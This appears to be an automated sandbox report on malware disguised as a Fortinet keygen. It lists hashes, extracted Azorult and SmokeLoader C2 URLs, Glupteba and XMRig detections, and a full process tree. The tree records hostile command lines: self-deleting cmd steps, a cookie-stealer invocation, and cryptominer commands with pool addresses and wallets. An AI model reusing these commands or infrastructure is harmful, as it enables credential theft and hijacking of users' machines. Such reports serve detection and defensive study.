Analysis
-
max time kernel
18s -
max time network
305s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 21:10
Static task
static1
Behavioral task
behavioral1
Sample
Fortinet.v1.0.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Fortinet.v1.0.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Fortinet.v1.0.keygen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Fortinet.v1.0.keygen.exe
Resource
win10v20201028
General
-
Target
Fortinet.v1.0.keygen.exe
-
Size
5.4MB
-
MD5
2a2be5dbf78e57ac4fd460faa2a52488
-
SHA1
8e0791500aeb17c4dc950e1a8c90d6036fb49d5b
-
SHA256
b66f057295395c28f1dd0d6807ac2c174885235d63ab3f3ff5b3d87719780228
-
SHA512
8715562e1b9e7c2357f95f3beb66383de7ec16d4dfbf7f0230a922ea420d27378e22ced50ee9d7e0da30a05bf269d5a07ca1a736b1b0828f3afbdfc8c10b9038
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/5332-236-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral3/memory/5332-243-0x00000000050A0000-0x00000000059AA000-memory.dmp family_glupteba behavioral3/memory/5332-245-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral3/memory/3648-227-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/3648-228-0x00000001402CA898-mapping.dmp xmrig behavioral3/memory/3648-230-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral3/memory/3648-261-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 11 IoCs
pid Process 1504 keygen-pr.exe 3656 keygen-step-1.exe 804 keygen-step-3.exe 3448 keygen-step-4.exe 2360 key.exe 2092 Setup.exe 3424 key.exe 4080 multitimer.exe 1004 setups.exe 1532 setups.tmp 1148 askinstall20.exe -
Loads dropped DLL 7 IoCs
pid Process 1532 setups.tmp 1532 setups.tmp 1532 setups.tmp 1532 setups.tmp 1532 setups.tmp 1532 setups.tmp 1532 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 270 ipinfo.io 274 ipinfo.io 409 api.ipify.org 111 api.ipify.org 129 ipinfo.io 131 ipinfo.io 174 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2360 set thread context of 3424 2360 key.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 24 IoCs
pid pid_target Process procid_target 4412 752 WerFault.exe 119 5288 752 WerFault.exe 119 4980 752 WerFault.exe 119 5012 752 WerFault.exe 119 4056 752 WerFault.exe 119 4836 752 WerFault.exe 119 4420 752 WerFault.exe 119 6296 6276 WerFault.exe 231 6220 6276 WerFault.exe 231 7152 6276 WerFault.exe 231 6236 6276 WerFault.exe 231 7260 6276 WerFault.exe 231 3500 6276 WerFault.exe 231 7264 6276 WerFault.exe 231 4660 6012 WerFault.exe 139 7852 6084 WerFault.exe 166 4228 6084 WerFault.exe 166 8332 6084 WerFault.exe 166 9112 6084 WerFault.exe 166 8664 6084 WerFault.exe 166 4092 6084 WerFault.exe 166 9108 6084 WerFault.exe 166 4528 6084 WerFault.exe 166 8360 6084 WerFault.exe 166 -
Delays execution with timeout.exe 1 IoCs
pid Process 6900 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 4248 taskkill.exe 8004 taskkill.exe 5436 taskkill.exe 7480 taskkill.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 2832 PING.EXE 5864 PING.EXE 4992 PING.EXE 5124 PING.EXE 9080 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 134 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 271 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 286 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 130 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1532 setups.tmp 1532 setups.tmp -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 2092 Setup.exe Token: SeCreateTokenPrivilege 1148 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 1148 askinstall20.exe Token: SeLockMemoryPrivilege 1148 askinstall20.exe Token: SeIncreaseQuotaPrivilege 1148 askinstall20.exe Token: SeMachineAccountPrivilege 1148 askinstall20.exe Token: SeTcbPrivilege 1148 askinstall20.exe Token: SeSecurityPrivilege 1148 askinstall20.exe Token: SeTakeOwnershipPrivilege 1148 askinstall20.exe Token: SeLoadDriverPrivilege 1148 askinstall20.exe Token: SeSystemProfilePrivilege 1148 askinstall20.exe Token: SeSystemtimePrivilege 1148 askinstall20.exe Token: SeProfSingleProcessPrivilege 1148 askinstall20.exe Token: SeIncBasePriorityPrivilege 1148 askinstall20.exe Token: SeCreatePagefilePrivilege 1148 askinstall20.exe Token: SeCreatePermanentPrivilege 1148 askinstall20.exe Token: SeBackupPrivilege 1148 askinstall20.exe Token: SeRestorePrivilege 1148 askinstall20.exe Token: SeShutdownPrivilege 1148 askinstall20.exe Token: SeDebugPrivilege 1148 askinstall20.exe Token: SeAuditPrivilege 1148 askinstall20.exe Token: SeSystemEnvironmentPrivilege 1148 askinstall20.exe Token: SeChangeNotifyPrivilege 1148 askinstall20.exe Token: SeRemoteShutdownPrivilege 1148 askinstall20.exe Token: SeUndockPrivilege 1148 askinstall20.exe Token: SeSyncAgentPrivilege 1148 askinstall20.exe Token: SeEnableDelegationPrivilege 1148 askinstall20.exe Token: SeManageVolumePrivilege 1148 askinstall20.exe Token: SeImpersonatePrivilege 1148 askinstall20.exe Token: SeCreateGlobalPrivilege 1148 askinstall20.exe Token: 31 1148 askinstall20.exe Token: 32 1148 askinstall20.exe Token: 33 1148 askinstall20.exe Token: 34 1148 askinstall20.exe Token: 35 1148 askinstall20.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1004 setups.exe 1532 setups.tmp -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 1032 wrote to memory of 2012 1032 Fortinet.v1.0.keygen.exe 79 PID 1032 wrote to memory of 2012 1032 Fortinet.v1.0.keygen.exe 79 PID 1032 wrote to memory of 2012 1032 Fortinet.v1.0.keygen.exe 79 PID 2012 wrote to memory of 1504 2012 cmd.exe 82 PID 2012 wrote to memory of 1504 2012 cmd.exe 82 PID 2012 wrote to memory of 1504 2012 cmd.exe 82 PID 2012 wrote to memory of 3656 2012 cmd.exe 83 PID 2012 wrote to memory of 3656 2012 cmd.exe 83 PID 2012 wrote to memory of 3656 2012 cmd.exe 83 PID 2012 wrote to memory of 804 2012 cmd.exe 84 PID 2012 wrote to memory of 804 2012 cmd.exe 84 PID 2012 wrote to memory of 804 2012 cmd.exe 84 PID 2012 wrote to memory of 3448 2012 cmd.exe 85 PID 2012 wrote to memory of 3448 2012 cmd.exe 85 PID 2012 wrote to memory of 3448 2012 cmd.exe 85 PID 1504 wrote to memory of 2360 1504 keygen-pr.exe 86 PID 1504 wrote to memory of 2360 1504 keygen-pr.exe 86 PID 1504 wrote to memory of 2360 1504 keygen-pr.exe 86 PID 3448 wrote to memory of 2092 3448 keygen-step-4.exe 87 PID 3448 wrote to memory of 2092 3448 keygen-step-4.exe 87 PID 804 wrote to memory of 2100 804 keygen-step-3.exe 88 PID 804 wrote to memory of 2100 804 keygen-step-3.exe 88 PID 804 wrote to memory of 2100 804 keygen-step-3.exe 88 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2360 wrote to memory of 3424 2360 key.exe 90 PID 2100 wrote to memory of 2832 2100 cmd.exe 92 PID 2100 wrote to memory of 2832 2100 cmd.exe 92 PID 2100 wrote to memory of 2832 2100 cmd.exe 92 PID 2092 wrote to memory of 4080 2092 Setup.exe 93 PID 2092 wrote to memory of 4080 2092 Setup.exe 93 PID 2092 wrote to memory of 1004 2092 Setup.exe 94 PID 2092 wrote to memory of 1004 2092 Setup.exe 94 PID 2092 wrote to memory of 1004 2092 Setup.exe 94 PID 3448 wrote to memory of 1148 3448 keygen-step-4.exe 95 PID 3448 wrote to memory of 1148 3448 keygen-step-4.exe 95 PID 3448 wrote to memory of 1148 3448 keygen-step-4.exe 95 PID 1004 wrote to memory of 1532 1004 setups.exe 96 PID 1004 wrote to memory of 1532 1004 setups.exe 96 PID 1004 wrote to memory of 1532 1004 setups.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\Fortinet.v1.0.keygen.exe"C:\Users\Admin\AppData\Local\Temp\Fortinet.v1.0.keygen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:3424
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3656
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:804 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2832
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3448 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:4080 -
C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe" 1 3.1617397882.6067887a94d46 1016⤵PID:4664
-
C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SCT1TK4ZVI\multitimer.exe" 2 3.1617397882.6067887a94d467⤵PID:4792
-
C:\Users\Admin\AppData\Local\Temp\tbijhciozew\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\tbijhciozew\cpyrix.exe" /VERYSILENT8⤵PID:2220
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:2184
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:5444
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5092
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:2284
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:4744
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:5192
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gpj5ezoi0py\fosbnu4ulj4.exe"C:\Users\Admin\AppData\Local\Temp\gpj5ezoi0py\fosbnu4ulj4.exe" /ustwo INSTALL8⤵PID:752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 6529⤵
- Program crash
PID:4412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 6649⤵
- Program crash
PID:5288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 6369⤵
- Program crash
PID:4980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 8209⤵
- Program crash
PID:5012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 8769⤵
- Program crash
PID:4056
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 9249⤵
- Program crash
PID:4836
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 8649⤵
- Program crash
PID:4420
-
-
-
C:\Users\Admin\AppData\Local\Temp\z4qineeblhb\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\z4qineeblhb\KiffApp1.exe"8⤵PID:4124
-
-
C:\Users\Admin\AppData\Local\Temp\ehab0tab2ak\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ehab0tab2ak\Setup3310.exe" /Verysilent /subid=5778⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\is-FSR4A.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-FSR4A.tmp\Setup3310.tmp" /SL5="$40202,138429,56832,C:\Users\Admin\AppData\Local\Temp\ehab0tab2ak\Setup3310.exe" /Verysilent /subid=5779⤵PID:5372
-
C:\Users\Admin\AppData\Local\Temp\is-AA9BH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AA9BH.tmp\Setup.exe" /Verysilent10⤵PID:5608
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"11⤵PID:4604
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:4372
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:4812
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"11⤵PID:6084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 90812⤵
- Program crash
PID:7852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 100412⤵
- Program crash
PID:4228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 104812⤵
- Program crash
PID:8332
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 108412⤵
- Program crash
PID:9112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 109612⤵
- Program crash
PID:8664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 112412⤵
- Program crash
PID:4092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 117212⤵
- Program crash
PID:9108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 148812⤵
- Program crash
PID:4528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6084 -s 155612⤵
- Program crash
PID:8360
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"11⤵PID:6044
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"11⤵PID:4884
-
C:\Users\Admin\AppData\Local\Temp\is-504UJ.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-504UJ.tmp\LabPicV3.tmp" /SL5="$20408,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"12⤵PID:5688
-
C:\Users\Admin\AppData\Local\Temp\is-Q40KJ.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-Q40KJ.tmp\ppppppfy.exe" /S /UID=lab21413⤵PID:4228
-
C:\Program Files\Java\TMABMYFVSO\prolab.exe"C:\Program Files\Java\TMABMYFVSO\prolab.exe" /VERYSILENT14⤵PID:4128
-
C:\Users\Admin\AppData\Local\Temp\is-FMV8N.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-FMV8N.tmp\prolab.tmp" /SL5="$40306,575243,216576,C:\Program Files\Java\TMABMYFVSO\prolab.exe" /VERYSILENT15⤵PID:1340
-
-
-
C:\Users\Admin\AppData\Local\Temp\d6-29045-792-4c4b7-3577fdf3b9533\Fajudevyshu.exe"C:\Users\Admin\AppData\Local\Temp\d6-29045-792-4c4b7-3577fdf3b9533\Fajudevyshu.exe"14⤵PID:4916
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ynwzjt35.yb0\md6_6ydj.exe & exit15⤵PID:2948
-
C:\Users\Admin\AppData\Local\Temp\ynwzjt35.yb0\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\ynwzjt35.yb0\md6_6ydj.exe16⤵PID:7024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exe & exit15⤵PID:6904
-
C:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exe16⤵PID:200
-
C:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\q1pg33cl.flz\toolspab1.exe17⤵PID:7728
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uawlvgsh.vtr\askinstall31.exe & exit15⤵PID:6188
-
C:\Users\Admin\AppData\Local\Temp\uawlvgsh.vtr\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\uawlvgsh.vtr\askinstall31.exe16⤵PID:6164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gutmkm0i.ozj\setup_10.2_mix.exe & exit15⤵PID:2064
-
C:\Users\Admin\AppData\Local\Temp\gutmkm0i.ozj\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\gutmkm0i.ozj\setup_10.2_mix.exe16⤵PID:7928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\153stbbr.11l\GcleanerWW.exe /mixone & exit15⤵PID:6432
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2vtkj4k1.1c4\app.exe /8-2222 & exit15⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\2vtkj4k1.1c4\app.exeC:\Users\Admin\AppData\Local\Temp\2vtkj4k1.1c4\app.exe /8-222216⤵PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p0er4q1r.a25\file.exe & exit15⤵PID:7596
-
C:\Users\Admin\AppData\Local\Temp\p0er4q1r.a25\file.exeC:\Users\Admin\AppData\Local\Temp\p0er4q1r.a25\file.exe16⤵PID:7344
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"17⤵PID:8152
-
C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵PID:6820
-
C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe" 1 3.1617398060.6067892c63698 10119⤵PID:7552
-
C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\QG0MJ30ATS\multitimer.exe" 2 3.1617398060.6067892c6369820⤵PID:7888
-
C:\Users\Admin\AppData\Local\Temp\cmqduns50xa\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cmqduns50xa\Setup3310.exe" /Verysilent /subid=57721⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\is-O8T42.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-O8T42.tmp\Setup3310.tmp" /SL5="$702CE,138429,56832,C:\Users\Admin\AppData\Local\Temp\cmqduns50xa\Setup3310.exe" /Verysilent /subid=57722⤵PID:8888
-
-
-
C:\Users\Admin\AppData\Local\Temp\ml2whfhp2vt\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ml2whfhp2vt\vpn.exe" /silent /subid=48221⤵PID:8928
-
C:\Users\Admin\AppData\Local\Temp\is-43FJI.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-43FJI.tmp\vpn.tmp" /SL5="$2077E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ml2whfhp2vt\vpn.exe" /silent /subid=48222⤵PID:6224
-
-
-
C:\Users\Admin\AppData\Local\Temp\tvd2sxooito\vict.exe"C:\Users\Admin\AppData\Local\Temp\tvd2sxooito\vict.exe" /VERYSILENT /id=53521⤵PID:6960
-
C:\Users\Admin\AppData\Local\Temp\is-F0LSK.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-F0LSK.tmp\vict.tmp" /SL5="$2073E,870426,780800,C:\Users\Admin\AppData\Local\Temp\tvd2sxooito\vict.exe" /VERYSILENT /id=53522⤵PID:5472
-
-
-
C:\Users\Admin\AppData\Local\Temp\uprzmb3xuso\3uv4501luhz.exe"C:\Users\Admin\AppData\Local\Temp\uprzmb3xuso\3uv4501luhz.exe" /ustwo INSTALL21⤵PID:5596
-
-
C:\Users\Admin\AppData\Local\Temp\cti030wi5yn\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\cti030wi5yn\cpyrix.exe" /VERYSILENT21⤵PID:7788
-
-
C:\Users\Admin\AppData\Local\Temp\dhhjowotzfj\app.exe"C:\Users\Admin\AppData\Local\Temp\dhhjowotzfj\app.exe" /8-2321⤵PID:9032
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\VA1GNWK8WQ\setups.exe"C:\Users\Admin\AppData\Local\Temp\VA1GNWK8WQ\setups.exe" ll18⤵PID:7056
-
C:\Users\Admin\AppData\Local\Temp\is-0MTBT.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-0MTBT.tmp\setups.tmp" /SL5="$20666,635399,250368,C:\Users\Admin\AppData\Local\Temp\VA1GNWK8WQ\setups.exe" ll19⤵PID:5144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"17⤵PID:2116
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵PID:7948
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
PID:5436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"17⤵PID:6876
-
C:\Users\Admin\AppData\Roaming\713F.tmp.exe"C:\Users\Admin\AppData\Roaming\713F.tmp.exe"18⤵PID:9100
-
C:\Users\Admin\AppData\Roaming\713F.tmp.exe"C:\Users\Admin\AppData\Roaming\713F.tmp.exe"19⤵PID:9156
-
-
-
C:\Users\Admin\AppData\Roaming\9081.tmp.exe"C:\Users\Admin\AppData\Roaming\9081.tmp.exe"18⤵PID:9176
-
-
C:\Users\Admin\AppData\Roaming\9003.tmp.exe"C:\Users\Admin\AppData\Roaming\9003.tmp.exe"18⤵PID:9164
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵PID:8308
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵PID:6984
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vyonmmih.rpn\Four.exe & exit15⤵PID:7772
-
C:\Users\Admin\AppData\Local\Temp\vyonmmih.rpn\Four.exeC:\Users\Admin\AppData\Local\Temp\vyonmmih.rpn\Four.exe16⤵PID:1196
-
C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\9OZB3R31I9\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:4316
-
